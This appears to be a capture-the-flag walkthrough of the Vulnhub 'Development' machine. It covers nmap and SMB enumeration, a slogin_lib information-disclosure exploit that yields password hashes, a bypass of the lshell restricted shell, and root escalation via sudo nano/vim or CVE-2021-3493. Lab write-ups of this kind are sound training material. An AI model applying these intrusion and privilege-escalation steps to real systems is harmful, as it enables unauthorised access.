5.6 KiB
Vulnhub-Development
NMAP
nmap -sC -sV 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 11:28 PKT
Nmap scan report for 192.168.1.6
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_ 256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp open ident?
|_auth-owners: oident
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open http-proxy IIS 6.0
PORT 139/445 (SMB)
We can see a share named access, let's see if we can access this as an anonymous user
Access is denied so , I ran eum4-linux-ng and it found some users on the machine
PORT 8080
On port we see an html giving us a hint to look at html_pages
Here we can see a number of pages so let's go through each of these pages one by one
About.html
This page tells that they are creating pofile for David
Config.html
This page has nothing
Default.html
This page has something in binary so let's convert and see what it is , I have a feeling it's a rabbit hole : \
Huh ?
Development.html
This page is interesting it says there's a page hackersecretpage which contains a link to upload files so let's where that is
And again this has nothing but looking at development.html source code there's a comment
DevelopmentSecretPage
On clicking the link we can get a page where it says to logout
Here I tried logging in with random credentials
I got this error , and it mentioned about a file called slogin_lib.inc.php , I searched for the file name on google and it straight away told that there's an exploit for it
Let's try the RFI exploit
I hosted a file on my machine to see if we can view it from there or not
It doesn't look it worked so let's try the Sensitive Infomration disclosure
We got some hashses let's try to crack them with crackstation
Let's try to ssh into the machine
We are in but something looks odd , it says type ? for help
If we type commands other than these it wil show error
So this looks like we are in restricted shell but I came across an error when I typed id
It seems lshell.py is being used so let's do a quick google search on that
This is a python script which restrict some commands to be executed on the shell we can forbid or allow any commands we want
So that's what was happeing , let's search if there are any bypasses related to lshell
https://www.aldeid.com/wiki/Lshell
Bingo , we can by pass this easily ,let's give this is a try
Reading work.txt
1.Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.
2.Patrick's start of the third year in this company!
3.Attend the meeting to discuss if password policy should be relooked at.
This isn't really helpful , so going back to patrick hash I tried to crack it one more time by going to online site
So we have switched to patrick and can see we can escalate to root either using vim or nano , let's visit GTFOBINS to escalate our shell
Using Vim
Using Nano
Launch nano as sudo sudo /bin/nano , then press alt+R
Then alt+X
You'll get the screen to execute commands
You got root !!!
Unintended way to root
Recently Ubuntu OverlayFS Local Privesc exploit was found
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493
So I used that exploit to get root by getting the PoC
https://github.com/briskets/CVE-2021-3493/blob/main/exploit.c
